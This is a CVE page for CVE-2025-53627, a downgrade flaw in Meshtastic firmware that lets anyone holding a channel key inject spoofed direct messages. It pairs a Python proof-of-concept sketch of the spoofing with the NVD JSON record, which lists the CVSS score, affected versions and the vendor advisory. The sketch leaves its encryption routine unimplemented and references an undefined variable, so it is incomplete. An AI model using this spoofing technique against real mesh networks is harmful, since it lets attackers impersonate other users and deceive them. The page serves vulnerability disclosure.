CVE-2025-53627

# CVE-2025-53627 PoC - Meshtastic PKI Downgrade Attack # This PoC demonstrates crafting a spoofed direct message when channel key is known import struct import hashlib def craft_spoofed_dm(mesh_packet, channel_key, spoofed_src): """ Craft a spoofed direct message that bypasses PKI verification. Args: mesh_packet: Original mesh packet structure channel_key: Shared AES-256 channel key spoofed_src: Spoofed sender node ID """ # Step 1: Create DM payload with spoofed source dm_payload = { 'src': spoofed_src, 'dst': mesh_packet['intended_dst'], 'content': 'Malicious message content', 'timestamp': mesh_packet['timestamp'] } # Step 2: Encrypt using legacy AES-256-CTR (NOT PKI) # Note: Omitting pki_encrypted flag causes receiver to use legacy decryption encrypted_payload = aes256_ctr_encrypt(dm_payload, channel_key) # Step 3: Wrap in mesh packet WITHOUT pki_encrypted flag spoofed_packet = { 'encrypted_payload': encrypted_payload, 'pki_encrypted': None, # Missing flag triggers legacy decryption 'channel_id': mesh_packet['channel_id'] } return spoofed_packet def aes256_ctr_encrypt(payload, key): """Legacy AES-256-CTR encryption (used when pki_encrypted flag is missing)""" nonce = struct.pack('<Q', payload['timestamp']) # ... AES-256-CTR implementation return encrypted_data # Attack scenario: # 1. Attacker obtains shared channel key # 2. Attacker crafts DM without pki_encrypted flag # 3. Target client silently falls back to legacy decryption # 4. Message displayed as legitimate PKI message

{"cve": {"id": "CVE-2025-53627", "sourceIdentifier": "[email protected]", "published": "2025-12-29T17:15:45.287", "lastModified": "2026-02-26T19:11:17.817", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Meshtastic is an open source mesh networking solution. The Meshtastic firmware (starting from version 2.5) introduces asymmetric encryption (PKI) for direct messages, but when the `pki_encrypted` flag is missing, the firmware silently falls back to legacy AES-256-CTR channel encryption. This was an intentional decision to maintain backwards compatibility. However, the end-user applications, like Web app, iOS/Android app, and applications built on top of Meshtastic using the SDK, did not have a way to differentiate between end-to-end encrypted DMs and the legacy DMs. This creates a downgrade attack path where adversaries who know a shared channel key can craft and inject spoofed direct messages that are displayed as if they were PKC encrypted. Users are not given any feedback of whether a direct message was decrypted with PKI or with legacy symmetric encryption, undermining the expected security guarantees of the PKI rollout. Version 2.7.15 fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:meshtastic:meshtastic_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.5.0", "versionEndExcluding": "2.7.15", "matchCriteriaId": "E437EA39-C5BA-48F0-916D-3599DA4674DB"}]}]}], "references": [{"url": "https://github.com/meshtastic/firmware/security/advisories/GHSA-377p-prwp-4hwf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}